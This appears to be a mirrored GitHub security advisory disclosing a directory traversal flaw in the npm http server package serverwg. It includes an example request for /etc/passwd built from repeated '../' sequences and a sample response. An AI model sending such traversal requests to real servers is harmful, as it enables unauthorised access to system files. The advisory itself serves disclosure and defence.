Loading HuntDB...

GHSA-2f29-pmpx-vj62

GitHub Security Advisory

Directory Traversal in serverwg

✓ GitHub Reviewed HIGH Has CVE

Advisory Details

`serverwg` is a simple http server.

`serverwg` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the URL.

**Example request:**
```http
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
and response:
```
HTTP/1.1 200 OK
Date: Wed, 17 May 2017 22:52:08 GMT
Connection: keep-alive

{contents of /etc/passwd}
```

## Recommendation

No patch is available for this vulnerability.

It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.

Affected Packages

npm serverwg
Affected versions: 0.0.0

Related CVEs

Key Information

GHSA ID
GHSA-2f29-pmpx-vj62
Published
September 1, 2020 4:52 PM
Last Modified
September 7, 2023 8:42 PM
CVSS Score
7.5 /10
Primary Ecosystem
npm
Primary Package
serverwg
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 3, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.